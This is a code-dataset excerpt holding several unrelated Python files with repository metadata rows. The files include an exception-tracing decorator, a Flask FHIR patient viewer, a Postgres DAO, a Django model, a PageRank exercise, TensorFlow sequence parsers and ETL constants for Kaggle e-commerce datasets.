raise ValueError(f'm = "{m}" Need to be int instead!')
case m if m not in [-1, 0, 1, 2]:
raise ValueError(
f'm = "{m}" Need to be either one of them, [-1 or 0 or 1 or 2]!'
)
def ckerr(f):
ckb = m
@wraps(f)
def trac(*args, **kwargs):
try:
if fn := f(*args, **kwargs):
return fn
del fn
except Exception as e:
details = inspect.stack()[1:][::-1]
match ckb:
case -1:
raise
case 0:
prex(details, e, f.__name__)
case 1:
v = io.StringIO()
with redirect_stdout(v):
prex(details, e, f.__name__)
crtk(v.getvalue())
v.flush()
case 2:
if filenm:
v = io.StringIO()
with redirect_stdout(v):
prex(details, e, f.__name__)
wrm = (
str(dt.today()).rpartition(".")[0]
+ ": TRACING EXCEPTION\n"
if ckrflex(filenm)
else "\n"
+ str(dt.today()).rpartition(".")[0]
+ ": TRACING EXCEPTION\n"
)
with open(filenm, "a") as log:
log.write(wrm)
log.write(v.getvalue())
v.flush()
del v, wrm
else:
raise
del details, e
return trac
return ckerr
def excpcls(m: int = -1, filenm: str = None):
"""Decorator for class (for functions only)"""
match m:
case m if not isinstance(m, int):
raise ValueError(f'm = "{m}" Need to be int instead!')
case m if m not in [-1, 0, 1, 2]:
raise ValueError(
f'm = "{m}" Need to be either one of them, [-1 or 0 or 1 or 2]!'
)
def catchcall(cls):
ckb = m
match cls:
case cls if not inspect.isclass(cls):
raise TypeError("Type error, suppose to be a class!")
case _:
for name, obj in vars(cls).items():
if inspect.isfunction(obj):
setattr(cls, name, excp(ckb, filenm)(obj))
return cls
return catchcall
| 30.419214 | 87 | 0.47617 | 786 | 6,966 | 4.148855 | 0.310433 | 0.016559 | 0.008586 | 0.020853 | 0.26035 | 0.217111 | 0.202392 | 0.202392 | 0.147807 | 0.147807 | 0 | 0.020863 | 0.401378 | 6,966 | 228 | 88 | 30.552632 | 0.761151 | 0.034597 | 0 | 0.252747 | 0 | 0.010989 | 0.143305 | 0.030335 | 0 | 0 | 0 | 0 | 0 | 1 | 0.054945 | false | 0 | 0.038462 | 0 | 0.137363 | 0.071429 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e7184bb619f9cf0c50a0b0b91431faa51ba55646 | 4,968 | py | Python | fbms/create_fg_bg_masks.py | MSiam/segment-any-moving | 82cb782867d866d2f4eb68230edb75f613e15a02 | [
"Apache-2.0"
] | 70 | 2019-09-16T17:55:55.000Z | 2022-03-07T00:26:53.000Z | fbms/create_fg_bg_masks.py | MSiam/segment-any-moving | 82cb782867d866d2f4eb68230edb75f613e15a02 | [
"Apache-2.0"
] | 9 | 2019-09-30T09:15:11.000Z | 2021-07-21T11:33:13.000Z | fbms/create_fg_bg_masks.py | MSiam/segment-any-moving | 82cb782867d866d2f4eb68230edb75f613e15a02 | [
"Apache-2.0"
] | 5 | 2019-09-25T05:14:37.000Z | 2021-07-08T20:13:47.000Z | """Create foreground/background motion masks from detections."""
import argparse
import logging
import pickle
import pprint
from pathlib import Path
import numpy as np
from PIL import Image
import pycocotools.mask as mask_util
from utils.fbms import utils as fbms_utils
from utils.log import add_time_to_path, setup_logging
def create_masks_sequence(groundtruth_dir, predictions_dir, output_dir,
threshold):
groundtruth = fbms_utils.FbmsGroundtruth(groundtruth_dir / 'GroundTruth')
mask_shape = None
for frame_number, frame_path in groundtruth.frame_label_paths.items():
filename = frame_path.stem
filename = filename.replace('_gt', '')
pickle_file = predictions_dir / (filename + '.pickle')
output_path = output_dir / (filename + '.png')
if output_path.exists():
continue
if not pickle_file.exists():
logging.warn("Couldn't find detections for "
f"{pickle_file.relative_to(predictions_dir.parent)}")
continue
if mask_shape is None:
image_size = Image.open(frame_path).size
mask_shape = (image_size[1], image_size[0])
with open(pickle_file, 'rb') as f:
frame_data = pickle.load(f)
if frame_data['segmentations'] is None:
frame_data['segmentations'] = [
[] for _ in range(len(frame_data['boxes']))
]
segmentations = []
scores = []
# Merge all classes into one.
for c in range(1, len(frame_data['segmentations'])):
scores.extend(frame_data['boxes'][c][:, 4])
segmentations.extend(frame_data['segmentations'][c])
final_mask = np.zeros(mask_shape, dtype=np.uint8)
for score, segmentation in zip(scores, segmentations):
if score <= threshold:
continue
mask = mask_util.decode(segmentation)
final_mask[mask == 1] = 255
Image.fromarray(final_mask).save(output_path)
def create_masks_split(groundtruth_dir, predictions_dir, output_dir,
threshold):
"""
Args:
groundtruth_dir (Path)
predictions_dir (Path)
output_dir (Path)
"""
for sequence_groundtruth in groundtruth_dir.iterdir():
if not sequence_groundtruth.is_dir():
continue
sequence_predictions = predictions_dir / sequence_groundtruth.name
sequence_output = output_dir / sequence_groundtruth.name
assert sequence_predictions.exists(), (
f"Couldn't find sequence predictions at {sequence_predictions}")
sequence_output.mkdir(exist_ok=True, parents=True)
create_masks_sequence(sequence_groundtruth, sequence_predictions,
sequence_output, threshold)
def main():
# Use first line of file docstring as description if it exists.
parser = argparse.ArgumentParser(
description=__doc__.split('\n')[0] if __doc__ else '',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('--detections-root', type=Path, required=True)
parser.add_argument('--fbms-root', type=Path, required=True)
parser.add_argument('--output-dir', type=Path, required=True)
parser.add_argument('--threshold', type=float, default=0.7)
args = parser.parse_args()
fbms_root = args.fbms_root
detections_root = args.detections_root
output_dir = args.output_dir
# assert not output_dir.exists()
assert detections_root.exists()
assert fbms_root.exists()
output_dir.mkdir(exist_ok=True, parents=True)
setup_logging(
add_time_to_path(output_dir / (Path(__file__).name + '.log')))
logging.info('Args: %s\n', pprint.pformat(vars(args)))
train_split = 'TrainingSet'
train_fbms = fbms_root / train_split
if train_fbms.exists():
train_detections = detections_root / train_split
train_output = output_dir / train_split
assert train_detections.exists(), (
f'No detections found for TrainingSet at {train_detections}')
create_masks_split(train_fbms, train_detections, train_output,
args.threshold)
test_split = 'TestSet'
test_fbms = fbms_root / test_split
if test_fbms.exists():
test_detections = detections_root / test_split
test_output = output_dir / test_split
assert test_detections.exists(), (
f'No detections found for TestSet at {test_detections}')
create_masks_split(test_fbms, test_detections, test_output,
args.threshold)
if not (train_fbms.exists() or test_fbms.exists()):
# Assume that --fbms-root and --detections-root refer to a specific
# split.
create_masks_split(fbms_root, detections_root, output_dir,
args.threshold)
if __name__ == "__main__":
main()
| 35.741007 | 78 | 0.652576 | 582 | 4,968 | 5.292096 | 0.254296 | 0.040909 | 0.028571 | 0.019481 | 0.127597 | 0.110065 | 0.092532 | 0.026623 | 0 | 0 | 0 | 0.003236 | 0.253623 | 4,968 | 138 | 79 | 36 | 0.8274 | 0.067432 | 0 | 0.090909 | 0 | 0 | 0.093342 | 0.015448 | 0 | 0 | 0 | 0 | 0.050505 | 1 | 0.030303 | false | 0 | 0.10101 | 0 | 0.131313 | 0.020202 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e719d280906322349a44262ff73a7f9f71dcec17 | 511 | py | Python | web_app/main.py | dimagi/commcare-fhir-web-app | c0afec94a177b79ee8314ac29692d0697567e1f2 | [
"Apache-2.0"
] | null | null | null | web_app/main.py | dimagi/commcare-fhir-web-app | c0afec94a177b79ee8314ac29692d0697567e1f2 | [
"Apache-2.0"
] | 3 | 2021-04-19T16:03:45.000Z | 2021-05-06T11:11:21.000Z | web_app/main.py | dimagi/commcare-fhir-web-app | c0afec94a177b79ee8314ac29692d0697567e1f2 | [
"Apache-2.0"
] | null | null | null | from flask import Flask, render_template, request
from web_app.fhir_client import fetch_patient_data
app = Flask(__name__)
@app.route('/')
def root():
return render_template('root.html')
@app.route('/patient/')
def view_patient():
patient_id = request.args['patient_id']
patient, observations, diag_reports = fetch_patient_data(patient_id)
return render_template(
"patient.html",
patient=patient,
observations=observations,
diag_reports=diag_reports,
)
| 22.217391 | 72 | 0.708415 | 62 | 511 | 5.516129 | 0.403226 | 0.122807 | 0.093567 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.183953 | 511 | 22 | 73 | 23.227273 | 0.820144 | 0 | 0 | 0 | 0 | 0 | 0.080235 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0.125 | 0.0625 | 0.375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e71b58e87dfbb0a1a266b2ea42679908ef474085 | 1,070 | py | Python | plugml/dao.py | mkraemer67/plugml | d1702a2b733e0511c735fea08e30b5b3f959a174 | [
"Apache-2.0"
] | 1 | 2015-03-26T13:28:47.000Z | 2015-03-26T13:28:47.000Z | plugml/dao.py | mkraemer67/plugml | d1702a2b733e0511c735fea08e30b5b3f959a174 | [
"Apache-2.0"
] | null | null | null | plugml/dao.py | mkraemer67/plugml | d1702a2b733e0511c735fea08e30b5b3f959a174 | [
"Apache-2.0"
] | null | null | null | import psycopg2
class Dao:
def __init__(self, dbUrl):
self._url = dbUrl
def __enter__(self):
conn = psycopg2.connect(self._url)
self.conn = conn
class _Dao:
def get(self, table, orderBy="id", limit=None):
cursor = conn.cursor()
sql = "SELECT * FROM %s ORDER BY %s" % (table, orderBy)
if limit:
sql += " LIMIT %i" % limit
cursor.execute(sql)
return cursor.fetchall()
def put(self, table, data):
cursor = conn.cursor()
cursor.execute("DELETE FROM %s" % table)
for i, vec in data:
sql = "INSERT INTO %s VALUES (%%s, %%s)" % table
arr = "{" + ','.join([str(x) for x in vec]) + "}"
cursor.execute(sql, (i, arr))
conn.commit()
return True
return _Dao()
def __exit__(self, type, value, traceback):
self.conn.close() | 32.424242 | 72 | 0.447664 | 111 | 1,070 | 4.171171 | 0.45045 | 0.038877 | 0.047516 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003306 | 0.434579 | 1,070 | 33 | 73 | 32.424242 | 0.761983 | 0 | 0 | 0.074074 | 0 | 0 | 0.084697 | 0 | 0.037037 | 0 | 0 | 0 | 0 | 1 | 0.185185 | false | 0 | 0.037037 | 0 | 0.407407 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e71fe0afc69089b13f571b743733ac7787ae15e6 | 394 | py | Python | website/models/home_tab.py | LKKTGB/lkk-website | d9cd2f5a11f2b4316ea4b242c5e09981207abdfb | [
"MIT"
] | null | null | null | website/models/home_tab.py | LKKTGB/lkk-website | d9cd2f5a11f2b4316ea4b242c5e09981207abdfb | [
"MIT"
] | 5 | 2020-04-26T09:03:33.000Z | 2022-02-02T13:00:39.000Z | website/models/home_tab.py | LKKTGB/lkk-website | d9cd2f5a11f2b4316ea4b242c5e09981207abdfb | [
"MIT"
] | null | null | null | from django.db import models
from django.utils.translation import ugettext_lazy as _
class HomeTab(models.Model):
name = models.CharField(_('home_tab_name'), max_length=100)
order = models.PositiveSmallIntegerField(_('home_tab_order'))
class Meta:
verbose_name = _('home_tab')
verbose_name_plural = _('home_tabs')
def __str__(self):
return self.name
| 26.266667 | 65 | 0.708122 | 49 | 394 | 5.285714 | 0.612245 | 0.081081 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009404 | 0.190355 | 394 | 14 | 66 | 28.142857 | 0.802508 | 0 | 0 | 0 | 0 | 0 | 0.111675 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0 | 0.2 | 0.1 | 0.8 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e726ce3420ac33849733ba1549bfbf5f6cbd4bab | 2,085 | py | Python | src/Chap13_Lab_PageRank.py | falconlee236/CodingTheMatrix-Answer | 4fab8087bde352913da71c8d86b802a93231b1b5 | [
"MIT"
] | null | null | null | src/Chap13_Lab_PageRank.py | falconlee236/CodingTheMatrix-Answer | 4fab8087bde352913da71c8d86b802a93231b1b5 | [
"MIT"
] | null | null | null | src/Chap13_Lab_PageRank.py | falconlee236/CodingTheMatrix-Answer | 4fab8087bde352913da71c8d86b802a93231b1b5 | [
"MIT"
] | null | null | null | from pagerank_test import small_links, A2
from pagerank import find_word, read_data
from vec import Vec
from mat import Mat
from math import sqrt
# Task 13.12.1
def find_num_links(L):
return Vec(L.D[0], {key: 1 for key in L.D[0]}) * L
# Task 13.12.2
def make_Markov(L):
num_links = find_num_links(L)
for i in L.f:
L[i] /= num_links[i[1]]
make_Markov(small_links)
# Task 13.12.3
def power_method(A1, k):
v = Vec(A1.D[1], {key: 1 for key in A1.D[1]})
col_len = len(A1.D[1])
for i in range(k):
sub_v = 0.15 * v
sum_v = sum(sub_v.f.values())
A2_vec = Vec(sub_v.D, {key: sum_v / col_len for key in sub_v.D})
u = 0.85 * A1 * v + A2_vec
print(sqrt((v * v) / (u * u)))
v = u
return v
# Task 13.12.4
links = read_data("links.bin")
# Task 13.12.5
def wikigoogle(w, k, p):
related = find_word(w)
related.sort(key=lambda x: p[x], reverse=True)
return related[:k]
# Task 13.12.6
make_Markov(links)
eigenvec = power_method(links, 2)
jordanlist = wikigoogle("jordan", 10, eigenvec)
# Task 13.12.7
def power_method_biased(A1, k, r):
v = Vec(A1.D[1], {key: 1 for key in A1.D[1]})
col_len = len(A1.D[1])
for i in range(k):
sub_v = 0.15 * v
sum_v = sum(sub_v.f.values())
Ar = 0.3 * Vec(A1.D[0], {r: sum(v.f.values())})
A2_vec = Vec(sub_v.D, {key: sum_v / col_len for key in sub_v.D})
u = 0.55 * A1 * v + A2_vec + Ar
print(sqrt((v * v) / (u * u)))
v = u
return v
sport_biased_eigenvec = power_method_biased(links, 2, "sport")
sport_biased_jordanlist = wikigoogle("jordan", 10, sport_biased_eigenvec)
print(jordanlist)
print(sport_biased_jordanlist)
# Task 13.12.8
def wikigoogle2(words, k, p):
wordlist = [set(find_word(x)) for x in words]
related = wordlist[0]
for i in range(1, len(wordlist)):
related = related.intersection(wordlist[i])
related.sort(key=lambda x: p[x], reverse=True)
return related[:k]
print(wikigoogle2(["jordan, tiger"], 10, sport_biased_eigenvec))
| 20.441176 | 73 | 0.608633 | 379 | 2,085 | 3.208443 | 0.208443 | 0.039474 | 0.052632 | 0.024671 | 0.322368 | 0.3125 | 0.3125 | 0.3125 | 0.3125 | 0.3125 | 0 | 0.060051 | 0.241247 | 2,085 | 101 | 74 | 20.643564 | 0.708597 | 0.0494 | 0 | 0.4 | 0 | 0 | 0.019847 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.109091 | false | 0 | 0.090909 | 0.018182 | 0.290909 | 0.090909 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e7276f28ac4e072f7bd65b6f8eba2b3bc1b6fc22 | 4,695 | py | Python | tasks/parsing/parsers.py | rasmusbergpalm/attend-copy-parse | 4673be36db64e982ceabc1e29ff34a296917f969 | [
"MIT"
] | 8 | 2021-05-11T12:12:23.000Z | 2022-02-10T09:56:14.000Z | tasks/parsing/parsers.py | karimcossentini/attend-copy-parse | 4acbe7bfc2be1b5c21c197a44b27143a9422b426 | [
"MIT"
] | 3 | 2021-08-11T06:44:56.000Z | 2022-03-14T09:16:03.000Z | tasks/parsing/parsers.py | rasmusbergpalm/attend-copy-parse | 4673be36db64e982ceabc1e29ff34a296917f969 | [
"MIT"
] | 2 | 2021-05-22T07:41:21.000Z | 2021-05-26T12:39:02.000Z | import tensorflow as tf
from tensorflow.contrib import layers
from tensorflow.contrib.cudnn_rnn import CudnnLSTM
from tensorflow.contrib.cudnn_rnn.python.layers.cudnn_rnn import CUDNN_RNN_BIDIRECTION
import os
from tasks.acp.data import RealData
class Parser:
def parse(self, x, context, is_training):
raise NotImplementedError()
def restore(self):
"""
Must return a tuple of (scope, restore_file_path).
"""
raise NotImplementedError()
class NoOpParser(Parser):
def restore(self):
return None
def parse(self, x, context, is_training):
return x
class OptionalParser(Parser):
def __init__(self, delegate: Parser, bs, seq_out, n_out, eos_idx):
self.eos_idx = eos_idx
self.n_out = n_out
self.seq_out = seq_out
self.bs = bs
self.delegate = delegate
def restore(self):
return self.delegate.restore()
def parse(self, x, context, is_training):
parsed = self.delegate.parse(x, context, is_training)
empty_answer = tf.constant(self.eos_idx, tf.int32, shape=(self.bs, self.seq_out))
empty_answer = tf.one_hot(empty_answer, self.n_out) # (bs, seq_out, n_out)
logit_empty = layers.fully_connected(context, 1, activation_fn=None) # (bs, 1)
return parsed + tf.reshape(logit_empty, (self.bs, 1, 1)) * empty_answer
class AmountParser(Parser):
"""
You should pre-train this parser to parse amounts otherwise it's hard to learn jointly.
"""
seq_in = RealData.seq_in
seq_out = RealData.seq_amount
n_out = len(RealData.chars)
scope = 'parse/amounts'
def __init__(self, bs):
os.makedirs("./snapshots/amounts", exist_ok=True)
self.bs = bs
def restore(self):
return self.scope, "./snapshots/amounts/best"
def parse(self, x, context, is_training):
with tf.variable_scope(self.scope):
# Input RNN
in_rnn = CudnnLSTM(1, 128, direction=CUDNN_RNN_BIDIRECTION, name="in_rnn")
h_in, _ = in_rnn(tf.transpose(x, [1, 0, 2]))
h_in = tf.reshape(tf.transpose(h_in, [1, 0, 2]), (self.bs, self.seq_in, 1, 256)) # (bs, seq_in, 1, 128)
# Output RNN
out_input = tf.zeros((self.seq_out, self.bs, 1)) # consider teacher forcing.
out_rnn = CudnnLSTM(1, 128, name="out_rnn")
h_out, _ = out_rnn(out_input)
h_out = tf.reshape(tf.transpose(h_out, [1, 0, 2]), (self.bs, 1, self.seq_out, 128)) # (bs, 1, seq_out, 128)
# Bahdanau attention
att = tf.nn.tanh(layers.fully_connected(h_out, 128, activation_fn=None) + layers.fully_connected(h_in, 128, activation_fn=None))
att = layers.fully_connected(att, 1, activation_fn=None) # (bs, seq_in, seq_out, 1)
att = tf.nn.softmax(att, axis=1) # (bs, seq_in, seq_out, 1)
attended_h = tf.reduce_sum(att * h_in, axis=1) # (bs, seq_out, 128)
p_gen = layers.fully_connected(attended_h, 1, activation_fn=tf.nn.sigmoid) # (bs, seq_out, 1)
p_copy = (1 - p_gen)
# Generate
gen = layers.fully_connected(attended_h, self.n_out, activation_fn=None) # (bs, seq_out, n_out)
gen = tf.reshape(gen, (self.bs, self.seq_out, self.n_out))
# Copy
copy = tf.log(tf.reduce_sum(att * tf.reshape(x, (self.bs, self.seq_in, 1, self.n_out)), axis=1) + 1e-8) # (bs, seq_out, n_out)
output_logits = p_copy * copy + p_gen * gen
return output_logits
class DateParser(Parser):
"""
You should pre-train this parser to parse dates otherwise it's hard to learn jointly.
"""
seq_out = RealData.seq_date
n_out = len(RealData.chars)
scope = 'parse/date'
def __init__(self, bs):
os.makedirs("./snapshots/dates", exist_ok=True)
self.bs = bs
def restore(self):
return self.scope, "./snapshots/dates/best"
def parse(self, x, context, is_training):
with tf.variable_scope(self.scope):
for i in range(4):
x = tf.layers.conv1d(x, 128, 3, padding="same", activation=tf.nn.relu) # (bs, 128, 128)
x = tf.layers.max_pooling1d(x, 2, 2) # (bs, 64-32-16-8, 128)
x = tf.reduce_sum(x, axis=1) # (bs, 128)
x = tf.concat([x, context], axis=1) # (bs, 256)
for i in range(3):
x = layers.fully_connected(x, 256)
x = layers.dropout(x, is_training=is_training)
x = layers.fully_connected(x, self.seq_out * self.n_out, activation_fn=None)
return tf.reshape(x, (self.bs, self.seq_out, self.n_out))
| 35.568182 | 140 | 0.613845 | 687 | 4,695 | 4 | 0.20524 | 0.041485 | 0.058224 | 0.039301 | 0.41048 | 0.308588 | 0.247089 | 0.157205 | 0.115721 | 0.086608 | 0 | 0.028242 | 0.260916 | 4,695 | 131 | 141 | 35.839695 | 0.763689 | 0.119702 | 0 | 0.256098 | 0 | 0 | 0.030049 | 0.01133 | 0 | 0 | 0 | 0 | 0 | 1 | 0.158537 | false | 0 | 0.073171 | 0.060976 | 0.47561 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e72ac116e6c24e4369118ac69de62498b785f6e9 | 7,297 | py | Python | scripts/etl/constants.py | lcbm/cs-data-viz | 9272833b612b8921fe21b1196904e40f9e827e0e | [
"0BSD"
] | null | null | null | scripts/etl/constants.py | lcbm/cs-data-viz | 9272833b612b8921fe21b1196904e40f9e827e0e | [
"0BSD"
] | null | null | null | scripts/etl/constants.py | lcbm/cs-data-viz | 9272833b612b8921fe21b1196904e40f9e827e0e | [
"0BSD"
] | null | null | null | """ File with the definitions of constants for the ETL scripts. """
SCRIPTS_DIR = "scripts"
SCRIPTS_ETL_DIR = f"{SCRIPTS_DIR}/etl"
SCRIPTS_ETL_TRANSFORM = f"{SCRIPTS_ETL_DIR}/transform.sh"
VENV_BIN = ".venv/bin"
VENV_KAGGLE_BIN = f"{VENV_BIN}/kaggle"
DOCKER_DIR = "docker"
ENVARS_DIR = f"{DOCKER_DIR}/env.d"
DATA_DIR = f"{DOCKER_DIR}/database/data"
DATA_FILE_EXTENSION = ".csv"
KAGGLE_DATASETS = [
"olistbr/brazilian-ecommerce",
"nicapotato/womens-ecommerce-clothing-reviews",
]
OLIST_TABLE_CATEGORY_TRANSLATIONS = "product_category_name_translation"
OLIST_TABLE_GEOLOCATION = "olist_geolocation_dataset"
OLIST_TABLE_CUSTOMERS = "olist_customers_dataset"
OLIST_TABLE_ORDERS = "olist_orders_dataset"
OLIST_TABLE_PRODUCTS = "olist_products_dataset"
OLIST_TABLE_SELLERS = "olist_sellers_dataset"
OLIST_TABLE_ORDER_PAYMENTS = "olist_order_payments_dataset"
OLIST_TABLE_ORDER_REVIEWS = "olist_order_reviews_dataset"
OLIST_TABLE_ORDER_ITEMS = "olist_order_items_dataset"
OLIST_DATASET_TABLES = [
OLIST_TABLE_CATEGORY_TRANSLATIONS,
OLIST_TABLE_GEOLOCATION,
OLIST_TABLE_CUSTOMERS,
OLIST_TABLE_ORDERS,
OLIST_TABLE_PRODUCTS,
OLIST_TABLE_SELLERS,
OLIST_TABLE_ORDER_PAYMENTS,
OLIST_TABLE_ORDER_REVIEWS,
OLIST_TABLE_ORDER_ITEMS,
]
OLIST_TABLE_CATEGORY_TRANSLATIONS_TYPE_MAP = {
"product_category_name": str,
"product_category_name_english": str,
}
OLIST_TABLE_CATEGORY_TRANSLATIONS_COLUMNS = (
OLIST_TABLE_CATEGORY_TRANSLATIONS_TYPE_MAP.keys()
)
OLIST_TABLE_GEOLOCATION_TYPE_MAP = {
"geolocation_zip_code_prefix": str,
"geolocation_lat": float,
"geolocation_lng": float,
"geolocation_city": str,
"geolocation_state": str,
}
OLIST_TABLE_GEOLOCATION_COLUMNS = OLIST_TABLE_GEOLOCATION_TYPE_MAP.keys()
OLIST_TABLE_CUSTOMERS_TYPE_MAP = {
"customer_id": str,
"customer_unique_id": str,
"customer_zip_code_prefix": str,
"customer_city": str,
"customer_state": str,
}
OLIST_TABLE_CUSTOMERS_COLUMNS = OLIST_TABLE_CUSTOMERS_TYPE_MAP.keys()
OLIST_TABLE_ORDERS_TYPE_MAP = {
"order_id": str,
"customer_id": str,
"order_status": str,
"order_purchase_date": str,
"order_approved_at": str,
"order_delivered_carrier_date": str,
"order_delivered_customer_date": str,
"order_estimated_delivery_date": str,
}
OLIST_TABLE_ORDERS_COLUMNS = OLIST_TABLE_ORDERS_TYPE_MAP.keys()
OLIST_TABLE_PRODUCTS_TYPE_MAP = {
"product_id": str,
"product_category_name": str,
"product_name_lenght": str,
"product_description_lenght": "Int64",
"product_photos_qty": "Int64",
"product_weight_g": "Int64",
"product_length_cm": "Int64",
"product_height_cm": "Int64",
"product_width_cm": "Int64",
}
OLIST_TABLE_PRODUCTS_COLUMNS = OLIST_TABLE_PRODUCTS_TYPE_MAP.keys()
OLIST_TABLE_SELLERS_TYPE_MAP = {
"seller_id": str,
"seller_zip_code_prefix": str,
"seller_city": str,
"seller_state": str,
}
OLIST_TABLE_SELLERS_COLUMNS = OLIST_TABLE_SELLERS_TYPE_MAP.keys()
OLIST_TABLE_ORDER_PAYMENTS_TYPE_MAP = {
"order_id": str,
"payment_sequential": "Int64",
"payment_type": str,
"payment_installments": "Int64",
"payment_value": float,
}
OLIST_TABLE_ORDER_PAYMENTS_COLUMNS = OLIST_TABLE_ORDER_PAYMENTS_TYPE_MAP.keys()
OLIST_TABLE_ORDER_REVIEWS_TYPE_MAP = {
"review_id": str,
"order_id": str,
"review_score": "Int64",
"review_comment_title": str,
"review_comment_message": str,
"review_creation_date": str,
"review_answer_date": str,
}
OLIST_TABLE_ORDER_REVIEWS_COLUMNS = OLIST_TABLE_ORDER_REVIEWS_TYPE_MAP.keys()
OLIST_TABLE_ORDER_ITEMS_TYPE_MAP = {
"order_id": str,
"order_item_id": "Int64",
"product_id": str,
"seller_id": str,
"shipping_limit_date": str,
"price": float,
"freight_value": float,
}
OLIST_TABLE_ORDER_ITEMS_COLUMNS = OLIST_TABLE_ORDER_ITEMS_TYPE_MAP.keys()
OLIST_DATASET_TABLES_TYPES_MAP = {
OLIST_TABLE_CATEGORY_TRANSLATIONS: OLIST_TABLE_CATEGORY_TRANSLATIONS_TYPE_MAP,
OLIST_TABLE_GEOLOCATION: OLIST_TABLE_GEOLOCATION_TYPE_MAP,
OLIST_TABLE_CUSTOMERS: OLIST_TABLE_CUSTOMERS_TYPE_MAP,
OLIST_TABLE_ORDERS: OLIST_TABLE_ORDERS_TYPE_MAP,
OLIST_TABLE_PRODUCTS: OLIST_TABLE_PRODUCTS_TYPE_MAP,
OLIST_TABLE_SELLERS: OLIST_TABLE_SELLERS_TYPE_MAP,
OLIST_TABLE_ORDER_PAYMENTS: OLIST_TABLE_ORDER_PAYMENTS_TYPE_MAP,
OLIST_TABLE_ORDER_REVIEWS: OLIST_TABLE_ORDER_REVIEWS_TYPE_MAP,
OLIST_TABLE_ORDER_ITEMS: OLIST_TABLE_ORDER_ITEMS_TYPE_MAP,
}
OLIST_DATASET_TABLES_NULLABLE_COLUMNS = {
OLIST_TABLE_CATEGORY_TRANSLATIONS: [],
OLIST_TABLE_GEOLOCATION: [],
OLIST_TABLE_CUSTOMERS: [],
OLIST_TABLE_ORDERS: [],
OLIST_TABLE_PRODUCTS: [],
OLIST_TABLE_SELLERS: [],
OLIST_TABLE_ORDER_PAYMENTS: [],
OLIST_TABLE_ORDER_REVIEWS: ["review_comment_title", "review_comment_message"],
OLIST_TABLE_ORDER_ITEMS: [],
}
WECR_DATASET_TABLE = "Womens_Clothing_E-Commerce_Reviews"
WECR_COLUMN_ID = "Unnamed: 0"
WECR_COLUMN_CLOTHING_ID = "Clothing ID"
WECR_COLUMN_AGE = "Age"
WECR_COLUMN_TITLE = "Title"
WECR_COLUMN_REVIEW_TEXT = "Review Text"
WECR_COLUMN_RATING = "Rating"
WECR_COLUMN_RECOMMENDED_IND = "Recommended IND"
WECR_COLUMN_POSITIVE_FEEDBACK_COUNT = "Positive Feedback Count"
WECR_COLUMN_DIVISION_NAME = "Division Name"
WECR_COLUMN_DEPARTMENT_NAME = "Department Name"
WECR_COLUMN_CLASS_NAME = "Class Name"
WECR_COLUMN_NAME_MAP = {
WECR_COLUMN_ID: "id",
WECR_COLUMN_CLOTHING_ID: WECR_COLUMN_CLOTHING_ID.lower().replace(" ", "_"),
WECR_COLUMN_AGE: WECR_COLUMN_AGE.lower().replace(" ", "_"),
WECR_COLUMN_TITLE: WECR_COLUMN_TITLE.lower().replace(" ", "_"),
WECR_COLUMN_REVIEW_TEXT: WECR_COLUMN_REVIEW_TEXT.lower().replace(" ", "_"),
WECR_COLUMN_RATING: WECR_COLUMN_RATING.lower().replace(" ", "_"),
WECR_COLUMN_RECOMMENDED_IND: WECR_COLUMN_RECOMMENDED_IND.lower().replace(" ", "_"),
WECR_COLUMN_POSITIVE_FEEDBACK_COUNT: WECR_COLUMN_POSITIVE_FEEDBACK_COUNT.lower().replace(
" ", "_"
),
WECR_COLUMN_DIVISION_NAME: WECR_COLUMN_DIVISION_NAME.lower().replace(" ", "_"),
WECR_COLUMN_DEPARTMENT_NAME: WECR_COLUMN_DEPARTMENT_NAME.lower().replace(" ", "_"),
WECR_COLUMN_CLASS_NAME: WECR_COLUMN_CLASS_NAME.lower().replace(" ", "_"),
}
